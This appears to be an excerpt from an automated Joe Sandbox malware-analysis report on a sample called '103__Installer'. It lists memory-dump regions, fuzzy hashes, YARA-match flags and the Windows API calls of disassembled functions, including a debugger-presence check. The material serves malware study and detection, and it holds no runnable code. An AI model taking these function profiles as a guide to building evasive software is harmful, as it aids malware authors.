                  • Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                  • Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd
                  Similarity
                  • API ID: H_prolog$IncrefLockitLockit::_std::_std::locale::facet::_
                  • String ID:
                  • API String ID: 3551698239-0
                  • Opcode ID: 2d5285a6f7b0454f63ad014ddca2fc5967f2237b946529e9e2b63b75815453c0
                  • Instruction ID: f650bde362fd1508f61620c596117abfa24e5a0e7ac3da8efff5af13c64c2397
                  • Opcode Fuzzy Hash: 2d5285a6f7b0454f63ad014ddca2fc5967f2237b946529e9e2b63b75815453c0
                  • Instruction Fuzzy Hash: F9F06D72600154AFCB16EB6CCC01BAE73EAAF18701F00C8A9F52DD22C1DBB48A548764
                  APIs
                  • __EH_prolog.LIBCMT ref: 00B7246D
                    • Part of subcall function 00B7130B: std::locale::facet::_Incref.LIBCPMT ref: 00B7131E
                    • Part of subcall function 00B72344: __EH_prolog.LIBCMT ref: 00B72349
                    • Part of subcall function 00B72344: std::_Lockit::_Lockit.LIBCPMT ref: 00B72358
                    • Part of subcall function 00B72344: int.LIBCPMT ref: 00B7236F
                  Memory Dump Source
                  • Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                  • Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd
                  Similarity
                  • API ID: H_prolog$IncrefLockitLockit::_std::_std::locale::facet::_
                  • String ID:
                  • API String ID: 3551698239-0
                  • Opcode ID: cf3937dd2f74a696d023d37563e54d9aad385ef2ac624f273b243c5955c524a5
                  • Instruction ID: a68516f1f8d87c789ad9a621caeffc890832cdf7b73a6219c414986ccb92473a
                  • Opcode Fuzzy Hash: cf3937dd2f74a696d023d37563e54d9aad385ef2ac624f273b243c5955c524a5
                  • Instruction Fuzzy Hash: EFF06D72A00155AFCB16EB6CCC01BAE73EAEF14701F00C8A9F52D96291DBB48A548764
                  Memory Dump Source
                  • Source File: 00000000.00000002.3334693834.0000000003B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 03B0D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0d000_103__Installer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 59a5686582cf2bc33a853071bb4db87042622a099beeaa129ee6623528d121b2
                  • Instruction ID: 144153ff4cfac122a34701f60e9b8540855c74c945eb248f6edd6d7fd30c2e8d
                  • Opcode Fuzzy Hash: 59a5686582cf2bc33a853071bb4db87042622a099beeaa129ee6623528d121b2
                  • Instruction Fuzzy Hash: F421F475504244DFDB05EF94D980B2ABF65FB98228F2885FDE8090B296C336D456CAA1
                  Memory Dump Source
                  • Source File: 00000000.00000002.3334693834.0000000003B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 03B0D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0d000_103__Installer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 99fa90ddb4ee017fdfc056b7864a7805b5309b7a0d48323febe676dea14afe97
                  • Instruction ID: 4dbe3ea831038bee2abe3839dfeafbd31e00a871ab61ad201b21cd76d222a15a
                  • Opcode Fuzzy Hash: 99fa90ddb4ee017fdfc056b7864a7805b5309b7a0d48323febe676dea14afe97
                  • Instruction Fuzzy Hash: DF11DF76504240CFCB02DF50D5C4B1ABF62FB84324F2886EDD8480B696C33AD456CBA1
                  Memory Dump Source
                  • Source File: 00000000.00000002.3334693834.0000000003B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 03B0D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0d000_103__Installer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8f22d20b4a4626a15088925dfb25192aa63acb6953c3c107ed76603d904f2c0e
                  • Instruction ID: bb5b91ecd2b898bb010d5739987eec4744ad04598deaf23f132f4b26b84b8380
                  • Opcode Fuzzy Hash: 8f22d20b4a4626a15088925dfb25192aa63acb6953c3c107ed76603d904f2c0e
                  • Instruction Fuzzy Hash: A501296240D3809FE7128A258994752BFA8EF53224F1984EBE9888F1E7D2685845CB72
                  Memory Dump Source
                  • Source File: 00000000.00000002.3334693834.0000000003B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 03B0D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0d000_103__Installer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3b2d46f495cc0ef0e62ff04a93826a7c4d34bb4b1c9ab473513ae830223b22ee
                  • Instruction ID: c6957d0b602e8091af79ba6da0c62e54bbb08266635decba1c2a85e69065d8e5
                  • Opcode Fuzzy Hash: 3b2d46f495cc0ef0e62ff04a93826a7c4d34bb4b1c9ab473513ae830223b22ee
                  • Instruction Fuzzy Hash: 9D01D4715043409FE7208E61CA84B66BF98EF42228F18C4AEED4D0A1C2D2799441CAB2
                  APIs
                  • GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,00B7FA9A,?,00B76AFC,?,000000BC,?,00000001,00000000,00000000), ref: 00B7F49C
                  • GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,00B7FA9A,?,00B76AFC,?,000000BC,?,00000001,00000000,00000000), ref: 00B7F4C5
                  • GetACP.KERNEL32(?,?,00B7FA9A,?,00B76AFC,?,000000BC,?,00000001,00000000), ref: 00B7F4D9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                  • Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd
                  Similarity
                  • API ID: InfoLocale
                  • String ID: ACP$OCP
                  • API String ID: 2299586839-711371036
                  • Opcode ID: d98ffac3b6b1cf094b053198ebff3fd6a157de6aa444afd0f41efd6f74d8a148
                  • Instruction ID: 7e6b8c6f193574527e94903420968582ba9a002d1a8ae70f0c0176df764bf762
                  • Opcode Fuzzy Hash: d98ffac3b6b1cf094b053198ebff3fd6a157de6aa444afd0f41efd6f74d8a148
                  • Instruction Fuzzy Hash: 0601D831505607BBEB11AB65DC0AF7B76E8EF01368F10C4A4F515E12E1EB64CA41D758
                  APIs
                  • IsDebuggerPresent.KERNEL32 ref: 00B7DF93
                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B7DFA8
                  • UnhandledExceptionFilter.KERNEL32(00B8AEE0), ref: 00B7DFB3
                  • GetCurrentProcess.KERNEL32(C0000409), ref: 00B7DFCF
                  • TerminateProcess.KERNEL32(00000000), ref: 00B7DFD6
                  Memory Dump Source
                  • Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                  • Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd
                  Similarity
                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                  • String ID:
                  • API String ID: 2579439406-0
                  • Opcode ID: cf9f8d8b51390d3cf2721328cf964c1a08eaff8ece577f8731fa6e4cad90d884
                  • Instruction ID: a824af287ffcc203a1e87dd3718aaf0f3b694ba77784aa1cb793b1cfcac4c13e
                  • Opcode Fuzzy Hash: cf9f8d8b51390d3cf2721328cf964c1a08eaff8ece577f8731fa6e4cad90d884
                  • Instruction Fuzzy Hash: 2721BEB8809306EBD701EF69EA846543BF5BB08740F50499BE81987A70EBB05980EF19
                  APIs
                  • SetUnhandledExceptionFilter.KERNEL32(Function_0000C6DB), ref: 00B7C722
                  Memory Dump Source
                  • Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                  • Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd
                  Similarity
                  • API ID: ExceptionFilterUnhandled
                  • String ID:
                  • API String ID: 3192549508-0
                  • Opcode ID: 0d30ba9cd245acc082909c70823caeb5622b3de5a65fc996064d28dc36ace64c
                  • Instruction ID: 88d5b3e7f4e67da3138ace570adb3297d2e1a7473ba355977e67e3f63dbc15ae
                  • Opcode Fuzzy Hash: 0d30ba9cd245acc082909c70823caeb5622b3de5a65fc996064d28dc36ace64c
                  • Instruction Fuzzy Hash: 4D9002B0291100974F0017705E4951639D25B9860274654986515DA078DE908100BA52
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3335700396.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_5f80000_103__Installer.jbxd
                  Similarity
                  • API ID:
                  • String ID: \V^m
                  • API String ID: 0-3751104571
                  • Opcode ID: 2a1f0c7fc2a5c6a2cb1da4094c7960a3a8ddc8b3141386659d79204416fd39e7
                  • Instruction ID: 4d94fd0e31dace8fcda59fa49d89c518986441d6cb6f6236233936bdf41c7e2e
                  • Opcode Fuzzy Hash: 2a1f0c7fc2a5c6a2cb1da4094c7960a3a8ddc8b3141386659d79204416fd39e7
                  • Instruction Fuzzy Hash: A4918370E0030ADFDF14EFA8C9887ADBBF2BF88718F148129D415AB254EB789841CB45
                  Memory Dump Source
                  • Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                  • Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                  • Instruction ID: 4908733bfad6decfb778ae413d466b55ebe478b39a787b7431e44d23bb20ca9a
                  • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                  • Instruction Fuzzy Hash: 1AC18E33D2A4F24987B5652D446823BEEE2AF91B8531B83D1DCD43F1AAC2276D09D7D0
                  Memory Dump Source
                  • Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                  • Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                  • Instruction ID: 6414cba3721f834412edb9613fe7bbb7c5efc5508a1e40bcaf17dd565a2a31a2
                  • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                  • Instruction Fuzzy Hash: B9C17F33D2A5F24987B5652D446823AEAE2AF91B8431B83D1CCD43F1AAC2276D09D7D0
                  Memory Dump Source
                  • Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                  • Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                  • Instruction ID: a06c210bd2970b54b1d42556341d269f8f35a04b6505fb078bb7667da8359fb7
                  • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                  • Instruction Fuzzy Hash: 84C19133E2A5F24587B1652D446822BEEE1AF91B8431F83D1CCD43F2AAC2276D09D7D0
                  Memory Dump Source
                  • Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                  • Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                  • Instruction ID: e35ef2d3204d4d086d4b18073aa17a6035ab259492a2820ff1c30a74f5e25a87
                  • Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                  • Instruction Fuzzy Hash: 63B1A233D2A4B24A87B1652D445823BEEE2AF91B8431AC3D0DCD03F5AAC6276D09D7D0
                  Memory Dump Source
                  • Source File: 00000000.00000002.3335700396.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_5f80000_103__Installer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 44b9444ab32ab44173bc28f89c1bcb6f151d55dabd4adb79558f956905022f97
                  • Instruction ID: 59b081cc533a9284a8e36908d1290753d67e1e3a6a2960e6022caa105b39602c
                  • Opcode Fuzzy Hash: 44b9444ab32ab44173bc28f89c1bcb6f151d55dabd4adb79558f956905022f97
                  • Instruction Fuzzy Hash: B9818035F012188BDB18EBB5886877E7BBBBFC8310B44856DD406E7388DE399C068791
                  Memory Dump Source
                  • Source File: 00000000.00000002.3334563354.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3ab0000_103__Installer.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 54093e43b9854a2d540d9dde3269946287902615532eb97d05431949d4969fe2
                  • Instruction ID: b3007c8cad634d2501572a08fee54b5b55c66b3f8babe63c40c8773931025736
                  • Opcode Fuzzy Hash: 54093e43b9854a2d540d9dde3269946287902615532eb97d05431949d4969fe2
                  • Instruction Fuzzy Hash: 29F0C936320245AFDF15DF59D841DAA77E9EF08664B49406EFD09DB222E235ED209B80
                  Memory Dump Source
                  • Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                  • Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e9b762c1d9091a2c99a71b58989111832db4a596a20ce5d8aa31cc9ae1b6fce7
                  • Instruction ID: b7981b2b79c9869a23804c67e8d6833124cc0914444bbad9644d1b21342d72dc
                  • Opcode Fuzzy Hash: e9b762c1d9091a2c99a71b58989111832db4a596a20ce5d8aa31cc9ae1b6fce7
                  • Instruction Fuzzy Hash: 71C012B1C04318AB8F04EFED544109DBBF8AA04200B40C5AA9405B2242D27052104644
                  APIs
                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00B75A5E), ref: 00B798ED
                  • __mtterm.LIBCMT ref: 00B798F9
                    • Part of subcall function 00B79632: DecodePointer.KERNEL32(00000002,00B79A5B,?,00B75A5E), ref: 00B79643
                    • Part of subcall function 00B79632: TlsFree.KERNEL32(00000002,00B79A5B,?,00B75A5E), ref: 00B7965D
                    • Part of subcall function 00B79632: DeleteCriticalSection.KERNEL32(00000000,00000000,77665810,?,00B79A5B,?,00B75A5E), ref: 00B7B634
                    • Part of subcall function 00B79632: _free.LIBCMT ref: 00B7B637
                    • Part of subcall function 00B79632: DeleteCriticalSection.KERNEL32(00000002,77665810,?,00B79A5B,?,00B75A5E), ref: 00B7B65E
                  • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00B7990F
                  • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00B7991C
                  • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00B79929
                  • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00B79936
                  • TlsAlloc.KERNEL32(?,00B75A5E), ref: 00B79986
                  • TlsSetValue.KERNEL32(00000000,?,00B75A5E), ref: 00B799A1
                  • __init_pointers.LIBCMT ref: 00B799AB
                  • EncodePointer.KERNEL32(?,00B75A5E), ref: 00B799BC
                  • EncodePointer.KERNEL32(?,00B75A5E), ref: 00B799C9
                  • EncodePointer.KERNEL32(?,00B75A5E), ref: 00B799D6
                  • EncodePointer.KERNEL32(?,00B75A5E), ref: 00B799E3
                  • DecodePointer.KERNEL32(00B797B6,?,00B75A5E), ref: 00B79A04
                  • __calloc_crt.LIBCMT ref: 00B79A19
                  • DecodePointer.KERNEL32(00000000,?,00B75A5E), ref: 00B79A33
                  • GetCurrentThreadId.KERNEL32 ref: 00B79A45
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                  • Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd
                  Similarity
                  • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                  • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                  • API String ID: 3698121176-3819984048
                  • Opcode ID: e5c9b7f64ced4e7013be8ab3000ddf36b5ae5571ab2a980ba229ad49fa850424
                  • Instruction ID: f64d2e973840ec281ace04335845fadab69cfbb34095fb411239f768e2253a4e
                  • Opcode Fuzzy Hash: e5c9b7f64ced4e7013be8ab3000ddf36b5ae5571ab2a980ba229ad49fa850424
                  • Instruction Fuzzy Hash: 933172719123119EEB20BF79AE0AA6E3FE4EB94360B14456BE52CD71B1DF748840CF50
                  APIs
                  • __EH_prolog.LIBCMT ref: 00B72349
                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B72358
                  • int.LIBCPMT ref: 00B7236F
                    • Part of subcall function 00B71035: std::_Lockit::_Lockit.LIBCPMT ref: 00B71046
                  • __CxxThrowException@8.LIBCMT ref: 00B723B4
                  • std::locale::facet::_Incref.LIBCPMT ref: 00B723C4
                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 00B723CA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                  • Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd
                  Similarity
                  • API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prologIncrefRegisterThrow
                  • String ID: bad cast
                  • API String ID: 262090721-3145022300
                  • Opcode ID: 52ae3253b3b3e85c1f83079987306cb7ac4673f00d2f1de55eaaf3d1f76cdfed
                  • Instruction ID: bdac8e1a45411172aa0ecd6f139eadd13fbb11b1e296ae6c94f6b54d6dc44099
                  • Opcode Fuzzy Hash: 52ae3253b3b3e85c1f83079987306cb7ac4673f00d2f1de55eaaf3d1f76cdfed
                  • Instruction Fuzzy Hash: 28110632A001049BCF05FB68CC42AAEB3F4EB80B20F108599F835B71D1CF349A01D7A4
                  APIs
                  • __EH_prolog.LIBCMT ref: 00B71E18
                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B71E27
                  • int.LIBCPMT ref: 00B71E3E
                    • Part of subcall function 00B71035: std::_Lockit::_Lockit.LIBCPMT ref: 00B71046
                  • __CxxThrowException@8.LIBCMT ref: 00B71E83
                  • std::locale::facet::_Incref.LIBCPMT ref: 00B71E93
                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 00B71E99
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                  • Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd
                  Similarity
                  • API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prologIncrefRegisterThrow
                  • String ID: bad cast
                  • API String ID: 262090721-3145022300
                  • Opcode ID: dc109811e9ef081c1ae75abbcb628e2b2426cb037ea7e063b548b54dcdc520eb
                  • Instruction ID: acc0c614c661584bc947f9476b401dbcb5c03e208a2cc492e181bac19109c2ff
                  • Opcode Fuzzy Hash: dc109811e9ef081c1ae75abbcb628e2b2426cb037ea7e063b548b54dcdc520eb
                  • Instruction Fuzzy Hash: C4118F32A001149BCF05FB68CD42AAEB7F5EB80B21F508599E43977191DB309A019760
                  APIs
                  • LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,?), ref: 00B75CED
                  • LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?), ref: 00B75D26
                  • __freea.LIBCMT ref: 00B75DBE
                  Memory Dump Source
                  • Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                  • Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd
                  Similarity
                  • API ID: String$__freea
                  • String ID:
                  • API String ID: 172395558-0
                  • Opcode ID: 39dceeac52555e0b3d2ac6dd6e7b6aa8f9f2bcff5eae0eacd7a481381b96fc74
                  • Instruction ID: 84d06a840f4648bcbba3108e0850842a009a69650ea3faa7f3ddc994d6fd7ac7
                  • Opcode Fuzzy Hash: 39dceeac52555e0b3d2ac6dd6e7b6aa8f9f2bcff5eae0eacd7a481381b96fc74
                  • Instruction Fuzzy Hash: E341807290090ABFDF325FA0CC85DAE7BF6EB44350B1485B9F679A2120DB718D61DB50
                  APIs
                  • __getptd_noexit.LIBCMT ref: 00B7741A
                    • Part of subcall function 00B79723: GetLastError.KERNEL32(?,?,00B7A8F0,00B74478,?,?,00B73C60,?,?,00B7101C), ref: 00B79727
                    • Part of subcall function 00B79723: ___set_flsgetvalue.LIBCMT ref: 00B79735
                    • Part of subcall function 00B79723: __calloc_crt.LIBCMT ref: 00B79749
                    • Part of subcall function 00B79723: DecodePointer.KERNEL32(00000000,?,?,00B7A8F0,00B74478,?,?,00B73C60,?,?,00B7101C), ref: 00B79763
                    • Part of subcall function 00B79723: GetCurrentThreadId.KERNEL32 ref: 00B79779
                    • Part of subcall function 00B79723: SetLastError.KERNEL32(00000000,?,?,00B7A8F0,00B74478,?,?,00B73C60,?,?,00B7101C), ref: 00B79791
                  • __calloc_crt.LIBCMT ref: 00B7743C
                  • __get_sys_err_msg.LIBCMT ref: 00B7745A
                  • _strcpy_s.LIBCMT ref: 00B77462
                  • __invoke_watson.LIBCMT ref: 00B77477
                  Strings
                  • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 00B77427, 00B7744A
                  Memory Dump Source
                  • Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                  • Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd
                  Similarity
                  • API ID: ErrorLast__calloc_crt$CurrentDecodePointerThread___set_flsgetvalue__get_sys_err_msg__getptd_noexit__invoke_watson_strcpy_s
